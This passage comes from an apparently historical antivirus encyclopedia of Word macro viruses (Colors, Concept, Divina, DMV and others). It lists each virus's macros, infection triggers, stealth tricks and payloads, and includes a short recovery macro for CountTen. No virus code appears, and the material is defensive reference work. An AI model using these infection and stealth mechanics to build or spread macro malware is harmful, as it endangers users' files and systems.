are turned off. It also uses "ToolsMacro" to make recognition of an infected file more difficult (called macro stealth technique). Upon activation of one of its macros (all except for AutoExec), Colors tries to infect the global template (normal.dot). It checks if all its macros are already present in the global template and if this is not the case, it transfers the virus macros or replaces already existing ones. The global template becomes infected when a document is opened, saved, closed or Microsoft Word is exited. Further documents become infected when a file is created (FileNew) or saved (FileSave, FileSaveAs). The destructive payload is located in the "macros" macro. Once activated Colors creates a variable in the [Windows] section of Win.ini with the name "countersu," which counts upwards from zero. After each 300th call, Colors changes the color palette of 21 Windows desktop elements. Background, buttons and borders will have new randomly selected colors, which will leave the user with a sometimes unusual looking desktop. [WORD_Colors.B (a.k.a Colo-b)] Virus name: WORD_Colors.B (a.k.a Colo-b) Virus Type: Word macro virus Number of macros: 9 Encrypted: Yes Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew, FileSave, FileSaveAs, macros, ToolsMacro Size of macros: 7006 Bytes Place of origin: Portugal Date of origin: April 1996 Payload: Yes Common In-The-Wild: No Description: Colors.B seems to be a variant of the previously found Colors.A virus. All of the macros seem to be identical to Colors.A, except for the "AutoOpen" macro, which seems to come from the Concept virus. It looks like a Colors infected document was re-infected with Concept, which replaced the "AutoOpen" macro with its own. Colors.B is still able to replicate, even though it has new virus code from a different virus. Colors.B is the first virus that combines virus codes from 2 different viruses (Colors.A and Concept.A). [WORD_Colors.C (a.k.a Colo-c)] Virus name: WORD_Colors.C (a.k.a Colo-c) Virus Type: Word macro virus Number of macros: 9 Encrypted: Yes Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew, FileSave, FileSaveAs, macros, ToolsMacro Size of macros: 6493 Bytes Place of origin: Unknown Date of origin: July 1996 Payload: Yes Common In-The-Wild: No Description: Colors.C seems to be a corrupted variant of the previously found Colors.A virus. The submitted virus sample infected the global template (normal.dot) and new documents, yet the new infected documents were unable to infect further documents. Only the first generation was able to infect other files. Colors.C is therefore very unlikely to survive. [Word.Colors.D (a.k.a Colo-d)] Virus name: WORD_Colors.D (a.k.a Colo-d) Virus Type: Word macro virus Number of macros: 9 Encrypted: Yes Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew, FileSave, FileSaveAs, macros, ToolsMacro Size of macros: 19688 Bytes Place of origin: Unknown Date of origin: August 1996 Payload: Yes Common In-The-Wild: No Description: Colors.D seems to be a combination of the previously found Colors.A virus and the Microsoft macro virus solution "Scanprot". Even though Colors.D has an anti-virus solution in its code, it is still able to spread and infect the global template (normal.dot) and further documents. [WORD_Colors.E] Virus name: WORD_Colors.E Virus Type: Word macro virus Number of macros: 9 Encrypted: Yes Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew, FileSave, FileSaveAs, Macros, ToolsMacro Size of macros: 6290 Bytes Place of origin: Unknown Date of origin: Fall 1996 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and the original Colors.A virus is that the "AutoOpen" macro has been replaced with a harmless one. This has no effect on the virus. Colors.E is still able to activate and infect further documents. [WORD_Colors.F] Virus name: Word.Colors.F Virus Type: Word macro virus Number of macros: 9 Encrypted: Yes Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew, FileSave, FileSaveAs, Macros, ToolsMacro Size of macros: 6402 Bytes Place of origin: Unknown Date of origin: Fall 1996 Destructive: No Seen In-The-Wild: No Description: The only difference between this new variant and the original Colors.A virus is that the "AutoOpen" macro has been replaced with a new one. This has no effect on the virus. Colors.F is still able to activate and infect further documents. [WORD_Colors.G] Virus name: WORD_Colors.G Virus Type: Word macro virus Number of macros: 9 Encrypted: Yes Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew FileSave, FileSaveAs, Macros, ToolsMacro Size of macros: 7006 Bytes Place of origin: Unknown Date of origin: January 1997 Destructive: No Seen In-The-Wild: No Description: Colors.G is a minor variant of the older Colors.B virus. The only difference between this new variant and Colors.B is that the "AutoOpen" macro has been replaced with an encrypted Concept macro. In addition, the "ToolsMacro" macro from Colors.B is corrupted. Due to the virus code change, Colors.B does not activate when an infected document is opened. Colors.F uses "ToolsMacro" to make recognition of an infected document more difficult (called macro stealth technique). For more information, please refer to the Colors.A virus description. [WORD_Colors.H] Virus name: WORD_Colors.H Virus Type: Word macro virus Number of macros: 9 Encrypted: Yes Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew, FileSave, FileSaveAs, Macros, ToolsMacro Size of macros: 9984 Bytes Place of origin: Unknown Date of origin: January 1997 Destructive: No Seen In-The-Wild: No Description: Colors.H is a minor variant based on the older Colors.A virus and the anti-virus macro solution "WWFix" from Datafellows. Even though Colors.H has an anti-virus solution in its code, it is still able to spread and infect further documents. When an infected document is opened, the new AutoOpen macro searches the system for the Concept virus. After the scan it tries to install the protective macros, which are not present. As a result Colors.H displays the following error message: " Document is not open " Colors.H uses "ToolsMacro" to make recognition of an infected document more difficult (called macro stealth technique). For more information, please refer to the Colors.A virus description. [WORD_Colors.I] Virus name: WORD_Colors.I Virus Type: Word macro virus Number of macros: 8 Encrypted: Yes Macro names: AutoExec, AutoOpen, AutoClose, FileExit, FileSave, FileSaveAs, ToolsMacro, Macros Size of macros: 6117 Bytes Place of origin: Unknown Date of origin: 1997 Destructive: No Common In-The-Wild: No Description: Colors.I is a new variant based on the original Colors.A virus. The main difference is the "AutoOpen" macro which was probably snatched from another virus. This new macro copies the "AutoOpen", "AutoClose" and "FileSaveAs" macro to the global template instead of calling the routines in the "macros" macro. In addition, Colors.I does not have any "FileNew" macro. Colors.I infects when an infected document is closed (AutoClose), saved (FileSave and FileSaveAs) and when the ToolsMacro command is used. Colors.I uses "ToolsMacro" to make recognition of an infected file more difficult (called macro stealth technique). For more information, please refer to the Colors.A virus description. [WORD_Color.J] Virus name: WORD_Colors.J Virus Type: Word macro virus Number of macros: 9 Encrypted: Yes Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew FileSave, FileSaveAs, Macros, ToolsMacro Size of macros: 6983 Bytes Place of origin: Unknown Date of origin: February 1997 Destructive: No Seen In-The-Wild: No Description: Colors.J is a minor variant based on the older Colors.B virus. The only difference between the two viruses is one line of unimportant code. Colors.J uses "ToolsMacro" to make recognition of an infected document more difficult (called macro stealth technique). For more information, please refer to the Colors.B virus description. [WORD_Colors.K] Virus name: WORD_Colors.K Virus Type: Word macro virus Number of macros: 9 Encrypted: Yes Macro names: Macros, FileNew, AutoExec, AutoOpen, FileExit, FileSave, AutoClose, FileSaveAs, ToolsMacro Size of macros: 6288 Bytes Place of origin: Unknown Date of origin: February 1997 Destructive: No Common In-The-Wild: No Description: Colors.K is a new variant based on the original Colors.A virus. The only difference between the two viruses is that the "AutoOpen" macro, with only 3 lines, has been snatched from another document. For more information, please refer to the Colors.A virus description. [Word.Concept.A (a.k.a Prank, WW6Macro, Winword, WBMV)] Virus name: Word.Concept.A (a.k.a Prank, WW6Macro, Winword, WBMV) Virus Type: Word macro virus Number of macros: 4 Encrypted: No Macro names: AutoOpen, AAAZAO, AAAZFS (FileSaveAs), Payload Size of macros: 1968 Bytes Place of origin: USA Date of origin: July 1995 Destructive: No Common In-The-Wild: Yes Description: Concept was the first macro virus found "In-the-Wild." It was discovered in July-August 1995 and is now the most common virus. Concept activates when an infected document is opened (AutoOpen). Upon activation, Concept checks for a previous infection of the global template (normal.dot). If none of the macros are present, Concept copies its virus macros. The "AAAZFS" macro is saved under the name "FileSaveAs." After infecting the global template, Concept makes an entry in the Win.ini file. It sets "WW6I=1" and displays a window with a "1" in it. Concept does not contain any destructive payload, even though is has a macro with the name "Payload." The "Payload" macro is empty except for the following text: " That's enough to prove my point " [WORD_Concept.B] Virus name: WORD_Concept.B Virus Type: Word macro virus Number of macros: 4 Encrypted: No Macro names: AutoOpen, AAAZAO, AAAZFS (FileSaveAs), Payload Size of macros: 2016 Bytes Place of origin: France Date of origin: Spring 1996 Destructive: No Common In-The-Wild: Yes Description: The only difference between Concept.A and Concept.B is that the virus author translated the "FileSaveAs" macro into its French equivalent. Therefore this new variant only works with the French version of Microsoft Word. [WORD_Concept.C] Virus name: WORD_Concept.C Virus Type: Word macro virus Number of macros: 4 Encrypted: No Macro names: AutoOpen, F1, F2, Boom, FileSaveAs Size of macros: 1834 Bytes in .doc files 1559 Bytes in .dot files Place of origin: Unknown Date of origin: Summer 1996 Destructive: No Common In-The-Wild: No Description: The difference between this new variant and the original Concept virus can be found in the macro names and the contents of the "Boom" macro. Concept.C activates when an infected document is opened (AutoOpen). Further documents become infected when they are saved with the "FileSaveAs" command. Concept.C displays a message box with a " 1 " in it. The "Boom" macro contains another message, yet not displayed: " Fight racism; Smash Fascizm " [WORD_Concept.D] Virus name: WORD_Concept.D (a.k.a. Haha) Virus Type: Word macro virus Number of macros: 4 Encrypted: 3 of the 4 macros Macro names: AutoOpen (FileSaveAs), EditSize, FileSort, HaHa Size of macros: 2129 Bytes in .doc files 2041 Bytes in .dot files Place of origin: Unknown Date of origin: Summer 1996 Payload Yes Common In-The-Wild: No Description: Concept.D activates when an infected file is opened (AutoOpen). Further documents become infected when they are saved with the FileSaveAs command. Upon infection of a new document, Concept.D changes the font color of all the existing text to white, which creates the impression that all the text disappeared (or was deleted). Concept.D then adds the following text to the active document: " i said: say goodbye to all your stuff (look at that hard drive spin!). " Upon an attempt to save an infected document, Concept.D tries to save the document 100 times, causing an irregular disk activity. [WORD_Concept.E] Virus name: WORD_Concept.E Virus Type: Word macro virus Number of macros: 4 Encrypted: No Macro names: AutoOpen (FileSaveAs), AAAZAO, AAAZFS, Load Size of macros: 1657 Bytes in .doc files 1472 Bytes in .dot files Place of origin: Unknown Date of origin: Summer 1996 Payload Yes Common In-The-Wild: No Description: The difference between this new variant and the original Concept virus can be found in the names of the macros and the contents of the "Load" macro. Concept.E activates when an infected document is opened (AutoOpen). Further documents become infected when they are saved with the FileSaveAs command. Upon infection of a new document, Concept.E displays a message with a " 1 " in it. Concept.E also has a virus code that tries to save the active document in the T:\VIR directory. [WORD_Concept.F (a.k.a. Parasite 1.0, P-Site)] Virus name: WORD_Concept.F (a.k.a. Parasite 1.0, P-Site) Virus Type: Word macro virus Alias: WORD_Parasite Number of macros: 7 Encrypted: Yes Macro names: K, A678, Para, Site, I8U9Y13, Paylaod, AutoOpen Size of macros: 3673 Bytes in .doc files 3453 Bytes in .dot files Place of origin: USA Date of origin: July 1996 Destructive: Yes Common In-The-Wild: Yes Description: Concept.F has various payloads. The first one replaces the following words in infected documents: "and" with "not". The second payload is a little bit more comprehensive. Concept.F checks the system time for a specific value in the days section. In case of a 16 (16th of each month), it activates its payloads. It then replaces the following letters/words in infected documents: "." (dot) with "," (comma) "and" with "not" "a" with an "e" This new Concept variant also displays the following window: " Parasite Virus 1.0 " " Your computer is infected with the Parasite Virus, Version 1.0! " [WORD_Parasite] Virus name: WORD_Parasite Virus Type: Word macro virus Alias: WORD_Concept.AD/F/F2/G/J/T/U Number of macros: 7 Encrypted: Yes Macro names: K, A678, Para, Site, I8U9Y13, Paylaod, AutoOpen Size of macros: 3673 Bytes in .doc files 3453 Bytes in .dot files Place of origin: USA Date of origin: July 1996 Destructive: Yes Common In-The-Wild: Yes Description: Parasite has various payloads. The first one replaces the following words in infected documents: "and" with "not". The second payload is a little bit more comprehensive. Parasite checks the system time for a specific value in the Day field. In case of a 16 (16th of each month), it activates its payloads. It then replaces the following letters/words in infected documents: "." (dot) with "," (comma) "and" with "not" "a" with an "e" This virus also displays the following window: " Parasite Virus 1.0 " " Your computer is infected with the Parasite Virus, Version 1.0! " [WORD_Concept.G (a.k.a. Parasite 0.8, P-Site)] Virus name: WORD_Concept.G (a.k.a. Parasite 0.8, P-Site) Virus Type: Word macro virus Number of macros: 7 Encrypted: Yes Macro names: K, A678, Para, Site, I8U9Y13, Paylaod, AutoOpen Size of macros: 3670 Bytes in .doc files 3450 Bytes in .dot files Place of origin: USA Date of origin: July/August 1996 Destructive: Yes Common In-The-Wild: No Description: According to the Concept.G virus code, this new variant is a beta release of the Concept.F (version 1.0) virus. Concept.G has various payloads. The first one replaces the following words in infected documents: "and" with "not" The second payload is a little bit more comprehensive. Concept.G checks the system time for a specific value in the days section. In case of a 16 (every 16th of the month) it activates its payloads. It then replaces the following letters/word in infected documents: "." (dot) with "," (comma) "and" with "not" "a" with an "e" [WORD_Concept.I] Virus name: WORD_Concept.I Virus Type: Word macro virus Number of macros: 4 or 5 Encrypted: No Macro names: AAAEED, AAAUUO, IPayload, DocClose, ToolsSpelling Size of macros: 2885 Bytes Place of origin: USA Date of origin: September 1996 Destructive: No Common In-The-Wild: No Description: Concept.I activates when an infected document is closed (DocClose). Further documents become infected in two different ways. It infects when the user selects the option "Tools/Spelling" or when an infected document is closed (DocClose). Depending on the selected infection routine, a new infected document contains 5 (DocClose infection routine) macros or only 4 (Tools/Spelling infection routine) macros. Upon infection of a new document, Concept.I displays a message with a " 1 " in it. [WORD_Concept.J (a.k.a. Parasite.B)] Virus name: WORD_Concept.J (a.k.a. Parasite.B) Virus Type: Word macro virus Number of macros: 7 Encrypted: Yes Macro names: K, A678, Para, Site, Payload, AutoOpen Size of macros: 3326 Bytes in .doc files 3042 Bytes in .dot files Place of origin: USA Date of origin: Summer 1996 Destructive: Yes Common In-The-Wild: Yes Description: The main difference between this new variant and Concept.G is that it does not have the "I8U9YB" macro (AutoExit in the global template). It also does not replace "." (dot) with "," (comma) on the 16th of each month. Concept.J still has some other payloads. It checks the system time for a specific value in the days section. In case of a 16 (every 16th of the month) it activates its payloads. It then replaces the following letters/word in infected documents: "and" with "not" "e" with an "a" (this used to be "a" with an "e" in Concept.G). [WORD_Concept.K:NL (a.k.a. Pheeew)] Virus name: WORD_Concept.K:NL (a.k.a. Pheeew) Virus Type: Word macro virus Number of macros: 4 Encrypted: No Macro names: AutoOpen, IkWordNietGoed1, IkWordNietGoed2, Lading Size of macros: 2759 Bytes Place of origin: Unknown Date of origin: Unknown Destructive: Yes Common In-The-Wild: No Description: Concept.K is the first Dutch macro virus. When an infected document is opened, Concept.K checks for a previous infection of the global template (normal.dot). It does this by looking for the two names of the macros "Lading" and "BestandOpslaanAls". If the global template is not infected, Concept.K copies its virus macros into the global template. The macro "IkWordNietGoed2" is saved under the name "BestandOpslaanAls" ("FileSaveAs"). Further documents become infected when the "FileSaveAs" command is used. After infection the virus shows various windows with the following text: Window 'Important': " Gotcha ! " Window 'FINAL WARNING!': " STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC " If a user clicks the "No" button on the last window, a destructive payload is activated. All files in the "C:\" and "C:\DOS" directory are deleted. This leaves the computer unbootable. [WORD_Concept.L (a.k.a. BlastC)] Virus name: WORD_Concept.L (a.k.a. BlastC) Virus Type: Word macro virus Number of macros: 7 Encrypted: No Macro names: Alignment, AutoOpen, BorderSet, FileSaveAs, AutoClose, ExitRoutine, BlastCDrive Size of macros: 3744 Bytes Place of origin: USA Date of origin: Unknown Payload: Yes Common In-The-Wild: No Description: Concept.L activates when an infected document is opened (AutoOpen). Further documents become infected when they are saved (FileSaveAs). Concept.L displays 2 messages: Upon activation: " Welcome to the 'WINWORD_BLAST_C' macro virus... " After infection of the global template (Normal.dot): " Uh Ohhh. NORMAL.DOT just got infected... " Upon closing the active document on the 24th of each month, Concept.L will start its destructive payload. It will launch the File Manager and delete the directory C:\DELETEME. [WORD_Concept.M (a.k.a. New_Horizon)] Virus name: WORD_Concept.M (a.k.a. New_Horizon) Virus Type: Word macro virus Number of macros: 5 Encrypted: No Macro names: Alignment, AutoOpen, BorderSet, FileSaveAs, AutoClose, ExitRoutine Size of macros: 2432 Bytes in .doc files 2055 Bytes in global template Place of origin: USA Date of origin: Unknown Destructive: No Common In-The-Wild: No Description: Concept.M activates when an infected document is opened (AutoOpen). Further documents become infected when they are saved with the "FileSaveAs" command. This new Concept variant displays 2 messages: Upon activation: " Uh Ohhh. NORMAL.DOT just got infected... " Upon opening of an infected document: " Welcome to the Winword.New_Horizons macro virus " [WORD_Concept.N (a.k.a. Concept.hcr)] Virus name: WORD_Concept.N (a.k.a. Concept.hcr) Virus Type: Word macro virus Number of macros: 4 Encrypted: Yes Macro names: FileSaveAs, XAAZAO, XAAZFS, XayLoad Size of macros: 1968 Bytes Place of origin: Unknown Date of origin: November 1996 Destructive: No Common In-The-Wild: No Description: Concept.N is a new variant based on the original Concept.A virus. All of its macro names start with the letter "X" (except for FileSaveAs). Therefore, Concept.N is classified as an intended virus, since it does not replicate naturally. [WORD_Concept.O:Tw] Virus name: WORD_Concept.O:Tw Virus Type: Word macro virus Number of macros: 4 Encrypted: No Macro names: AutoOpen, Payload, AAAZAO, AAAZFS Size of macros: 1968 Bytes in documents Place of origin: Unknown Date of origin: 1996 Destructive: No Common In-The-Wild: Yes Description: The main difference between this new variant and the original Concept.A virus is that Concept.O only works with the Chinese version of Microsoft Word. Concept.O infects the global template when an infected document is opened (AutoOpen). Further documents become infected when they are saved with the "FileSaveAs" command. For more information, please refer to the Concept.A virus description. [WORD_Concept.Q] Virus name: WORD_Concept.Q Virus Type: Word macro virus Number of macros: 4 Encrypted: No Macro names: AutoOpen, Payload, AAAZAO, AAAZFS Size of macros: 1959 Bytes in documents 1652 Bytes in global template Place of origin: Unknown Date of origin: 1996 Destructive: No Common In-The-Wild: Yes Description: The difference between this new variant and the original Concept virus is the contents of the "Payload" macro. Concept.Q does not contain the comment "That's enough to prove my point." Concept.Q infects the global template when an infected document is opened (AutoOpen). Further documents become infected when they are saved with the "FileSaveAs" command. For more information, please refer to the Concept.A virus description. [WORD_Concept.R (a.k.a Sutra, Diamond)] Virus name: WORD_Concept.R (a.k.a Sutra, Diamond) Virus Type: Word macro virus Number of macros: 4 Encrypted: No Macro names: AutoOpen (FileSaveAs), CTFISTCCLLESS11, "CTFBORNIN83" DiamondSutra, FileSaveAs Size of macros: 4069 Bytes in .doc files 3221 Bytes in global template Place of origin: Unknown Date of origin: Unknown Destructive: No Seen In-The-Wild: No Description: This new variant is based on the original Concept.A virus. Only a few additions have been made and some macro names were changed. When Concept.R infects the global template it displays various messages: " SHOSHI-11=TCCL6F200P,in 1983, Japan!!!!! " " SHOSHIisCTFexactly, inYYY with pwd 901109, BUT less 11years " " BUT SEEMS & CHAR === EXACT " " Guy who understand 29 and Prajnaparamita Diamond Sutra " " governors noble truth within the self self self self self so " " CTF=TCCL-11 BUT CTF in 1983 " " CTF's wife is LTC.JAC 24 ; CTF = SUN SUN SUN SUN + 4 CRUELTY " " You will then tell your friends and your friends will tell " " others and other .. other other other other other other !!!!! " " till till till the sun rises in the east which means " " CTF=TCCLby all sense " When a document becomes infected, Concept.R adds an AutoCorrect entry that replaces "teh" with "Shoshi in 1983 is the Sun." This payload works only with the Windows 95 version of Microsoft Word (Word 7.0). [WORD_Concept.V] Virus name: WORD_Concept.V Virus Type: Word macro virus Number of macros: 3 Encrypted: No Macro names: AutoOpen, MSlothAE, MSlothSA Size of macros: 1484 Bytes Place of origin: USA Date of origin: January 1997 Payload: Yes Common In-The-Wild: No Description: Concept.V is a new variant based on Concept and the Wazzu.H virus. It includes the payload routine from Wazzu.H, inside the "AutoExec" macro (MSlothAE in documents), and the "AutoOpen" ("FileSaveAs" in the global template) from Concept. Even though this new variant is based on two different viruses, it is still able to spread and infect further documents. For more information, please refer to the Wazzu.H and Concept.A virus descriptions. [WORD_Concept.Y] Virus name: WORD_Concept.Y Virus Type: Word macro virus Number of macros: 4 Encrypted: No Macro names: AAAZAO, AAAZFS, Payload, AutoOpen Size of macros: 1992 Bytes Place of origin: Unknown Date of origin: 1997 Destructive: No Common In-The-Wild: No Description: Concept.Y is a new variant based on the original Concept.A virus. The main difference between the two viruses is the "Payload" macro, which has the following addition to its macro code: " (For testing only...) " For more information, please refer to the Concept.A virus description. [WORD_Concept.Z] Virus name: WORD_Concept.Z Virus Type: Word macro virus Number of macros: 4 Encrypted: No Macro names: AutoOpen, AAAAAB, AAAAAC, AAAAAD (AAAAAA, FileSave, FileSaveAs, ToolsMacro) Size of macros: 1774 Bytes Place of origin: Unknown Date of origin: 1996 Destructive: No Common In-The-Wild: Yes Description: Concept.Z activates when an infected document is opened (AutoOpen). Further documents become infected when they are saved with the "FileSave" and "FileSaveAs" commands. After infecting the global template, Concept.Z makes an entry in the WINWORD6.INI file. It sets "WW6I=1." Concept.Z tries to hide its presence by using "ToolsMacro" (called macro stealth technique). It does not contain any destructive payload. [WORD_CountTen.A (a.k.a. SaveCount)] Virus name: WORD_CountTen.A (a.k.a. SaveCount) Virus Type: Word macro virus Number of macros: 3 Encrypted: Yes Macro names: AutoOpen FileSave, FileSaveAs Size of macros: 956 Bytes Place of origin: United States Date of origin: December 1996 Destructive: Yes Seen In-The-Wild: Yes Description: CountTen infects documents when an infected document is opened and saved via the "FileSave" and FileSaveAs" commands. When CountTen infects a file, it sets the variable "SaveCount." When an infected file is saved, this variable increments. This technique is used to keep track of the number of times an infected document has been saved. Upon reaching 10, CountTen sets the following password: " What the hell are you doing? " This password is too long for the Microsoft Word password box and therefore users can not change the password. To get access to a password encrypted file, remove the viral macros and create an "AutoOpen" macro with the following information in the global template (NORMAL.DOT): Sub Main ToolsUnprotectDocument.DocumentPassword="What the hell are you doing?" End Sub [WORD_Daniel.A (a.k.a Daniel_1F)] Virus name: WORD_Daniel.A (a.k.a Daniel_1F) Virus Type: Word macro virus Number of macros: 2 Encrypted: Yes Macro names: AutoOpen (Word6Menu), MacroManager Size of macros: 2718 Bytes Place of origin: Unknown Date of origin: September 1996 Destructive: Yes Common In-The-Wild: No Description: Daniel activates when an infected document is opened (AutoOpen). By removing the Tools/Macro option, Daniel tries to make recognition of an infected file more difficult (called macro stealth technique). Daniel also redefines the File/Save menu item. Instead of the original action, it will run the MacroManager. When a file is opened with a non standard extension (not .doc or .dot), Daniel will change the document summary info. Under the keyword "Daniel_Stone" the following comment can be found: " All information should be free " [WORD_Dark.A (a.k.a. DarkSide)] Virus name: WORD_Dark.A (a.k.a. DarkSide) Virus Type: Word macro virus Number of macros: 4 Encrypted: Yes Macro names: AutoClose, DarkSide1, HerramMacro, ToolsMacro Size of macros: 1304 Bytes Place of origin: Peru Date of origin: Unknown Payload: Yes Seen In-The-Wild: No Description: Dark infects the global template (normal.dot) when an infected document is closed. Further documents become infected when they are also closed. Upon infection Dark creates the DARKSIDE.1 file in the directory of an infected file. The file contains the following message: " ATENCION: esta computadora ha sido infectada!. " " DarkSide1 sin una computadora es como Billy " " The Kid sin un revolver! ! " " ... Virus DarkSide1 creado en la ciudad de Lima en enero de 1997 " " -=] DarkSide1 Is a peruvian virus writer [=- " To make recognition of an infected document more difficult, Dark overwrites the Tools/Macro and Herram/Macro options with its own code (called macro stealth technique). [WORD_Date.A (a.k.a. AntiDMV, Infezione)] Virus name: WORD_Date.A (a.k.a. AntiDMV, Infezione) Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1042 Bytes Place of origin: USA Date of origin: 1996 Destructive: Yes Common In-The-Wild: Yes Description: Date infects the global template (normal.dot) once an infected document in opened. Further documents become infected when they are opened. Infection occurs only until June 1, 1996. By the time you read this document, Date should not be a threat anymore even though infected documents might still be around. Date is also known under the name AntiDMV. This name was chosen because it removes the "AutoClose" macro from documents. The macro virus "DMV," which has only one "AutoClose" macro, can therefore be removed with the Date virus. [WORD_Dedicato.A:It] Virus name: WORD_Dedicato.A:It Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoClose Size of macros: 742 Bytes Place of origin: Italy Date of origin: April 1997 Payload: Yes Seen In-The-Wild: No Description: Dedicato infects the global template when an infected document is closed. Further documents become infected when they are also closed (AutoClose). Dedicato uses language specific commands, therefore it only works with the Italian version of Microsoft Word. The following comment can be found in the AutoClose macro: " REM Questo MacroVirus e' dedicato alla mia ex-ragazza " " REM Federica, che anche se molti diranno il contrario.. " " REM io ho amato tanto...e ora mi manca... (Gianlu) " When Dedicato triggers (8th and 20th of each month), it displays the following 3 messages: " ....MacroVirus Federica in esecuzione.... " " ....Federica Mi Manchi.... " " Master Boot Sector Damaged " [WORD_Dietzel.A] Virus name: WORD_Dietzel.A Virus Type: Word macro virus Number of macros: 5 Encrypted: Yes Macro names: DATEISchliessen, EXTRASMakro, DATEIDokVorlagen, DATEISpeichernUnter, DATEIBeenden Size of macros: 3987 Bytes Place of origin: Germany Date of origin: August 1996 Destructive: No Common In-The-Wild: No Description: Activation of Dietzel occurs when an infected document is closed (DATEISchliessen) or when Microsoft Word is exited (DATEIBeenden). Dietzel tries to make recognition of an infected document more difficult by replacing the Tools/Macro option with a dialog box very similar to the original one (called macro stealth technique). It only displays the macros in the global template, except for the virus macros. Dietzel's infection routine is very similar to that of traditional companion viruses. The original document remains untouched, instead for each saved document Dietzel creates a copy of the infected global template. This new file is stored in the same directory but with a .BAK extension. The saved document is then registered based on this new infected template. Whenever an infected document is closed the associated infected template will be loaded as a global template. [WORD_Divina.A (a.k.a. Roberta)] Virus name: WORD_Divina.A (a.k.a. Roberta) Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoClose Size of macros: 2357 Bytes Place of origin: Italy Date of origin: 1996 Destructive: No Common In-The-Wild: Yes Description: Divina infects the global template (normal.dot) when an infected document is opened and then closed. Further documents become infected when they are closed via the "AutoClose" command. Divina has two payloads. The first payload checks the system time, and in case of a value of 17 in the minutes field, it will display a set of windows. Between each displayed box it will pause and beep. " ROBERTA TI AMO! " " Virus 'ROBERTA' is running. Hard Disk damaged. Start antivirus? " " Exit from system and low level format are recommended. " " Exit from System? " After the last message Divina tries to exit Windows. The second payload is activated on May 21. Divina will again check the system clock, and if a document is being closed between the 10th and 20th or between the 40th and 50th minute, it will display another 2 windows. " DIVINA IS THE BEST! " Even though Divina does not contain any destructive payloads, a scared user might low-level format his/her hard drive. [WORD_Divina.B (a.k.a. Roberta)] Virus name: WORD_Divina.B (a.k.a. Roberta) Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoClose Size of macros: 1774 Bytes Place of origin: Italy Date of origin: 1996 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and the original Divina.A virus is that Divina.B does not have the second payload, which activates on May 21. Divina.B infects the global template (normal.dot) when an infected document is opened and then closed. Further documents become infected when they are closed with the "AutoClose" command. Divina.B has one payload that checks the system time, and in case of a value of 17 in the minutes field, it will display a set of windows. Between each displayed box it will pause and beep. " ROBERTA TI AMO! " " Hard Disk damaged " " Exit from system and low level format are recommended. " " Exit from System? " After the last message Divina tries to exit Windows. Even though Divina.B does not contain any destructive payloads, a scared user might low-level format his/her hard drive. [WORD_Divina.C (a.k.a. Roberta)] Virus name: WORD_Divina.C (a.k.a. Roberta) Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoClose Size of macros: 3234 Bytes Place of origin: Italy Date of origin: 1996 Destructive: No Common In-The-Wild: No Description: Divina.C is a rewritten variant of Divina. It does not contain the second payload, which activates on May 21. Divina.C infects the global template (normal.dot) when an infected document is opened and then closed. Further documents become infected when they are closed (AutoClose). Divina.C has one payload that checks the system time, and in case of a value of 17 in the minutes field, it will display a set of windows. Between each displayed box it will pause and beep. After the last message Divina tries to exit Windows. [WORD_Divina.D (a.k.a. Roberta)] Virus name: WORD_Divina.D (a.k.a. Roberta) Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoClose Size of macros: 3234 Bytes Place of origin: Italy Date of origin: 1996 Destructive: No Common In-The-Wild: Yes Description: The main difference between this new variant and Divina.C is that the code has been slightly modified. Divina.D infects the global template (normal.dot) when an infected document is opened and then closed. Further documents become infected when they are closed (AutoClose). Divina.D has one payload that checks the system time, and in case of a value of 17 in the minutes field, it will display a set of windows. Between each displayed box it will pause and beep. After the last message Divina.D tries to exit Windows. [WORD_Divina.E (a.k.a. Roberta)] Virus name: WORD_Divina.E (a.k.a. Roberta) Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoClose Size of macros: 3295 Bytes Place of origin: Italy Date of origin: 1996 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and Divina.C is that the code has been slightly modified. Divina.E contains 2 lines made out of "*". Divina.E infects the global template (normal.dot) when an infected document is opened and then closed. Further documents become infected when they are closed (AutoClose). Divina.E has one payload that checks the system time, and in case of a value of 17 in the minutes field, it will display a set of windows. Between each displayed box it will pause and beep. After the last message Divina.E tries to exit Windows. [WORD_Divina.F (a.k.a. Roberta)] Virus name: WORD_Divina.F (a.k.a. Roberta) Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoClose Size of macros: 3234 Bytes Place of origin: Italy Date of origin: 1997 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and the previous Divina viruses is that the code has been slightly modified. Divina.F infects the global template (normal.dot) when an infected document is opened and then closed. Further documents become infected when they are closed (AutoClose). For more information, please refer to the previous Divina virus descriptions. [WORD_DMV.A (a.k.a. Demonstration)] Virus name: WORD_DMV.A (a.k.a. Demonstration) Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoClose Size of macros: 3002 Bytes Place of origin: USA Date of origin: Fall 1994 Destructive: No Common In-The-Wild: No Description: DMV was the first macro virus written by Joel McNamara, who published a detailed paper about macro viruses. It is believed that DMV invited additional virus authors to write Word macro viruses. While the paper was not published until Concept was discovered, it helped virus authors to use new techniques. Joel McNamara also published an Excel macro virus, which is nonfunctional (EXCEL_DMV.A) DMV infects the global template (normal.dot) when an infected document is closed. Further documents become infected when they are also closed. Upon infection, DMV displays the following messages: " Counting global macros " " AutoClose macro virus is already installed in NORMAL.DOT. " " Infected NORMAL.DOT with a copy of AutoClose macro virus. " " AutoClose macro virus already present in this document. " " Saved current document as template. " " Infected current document with copy of AutoClose macro virus. " " Macro virus has been spread. Now execute some other code " 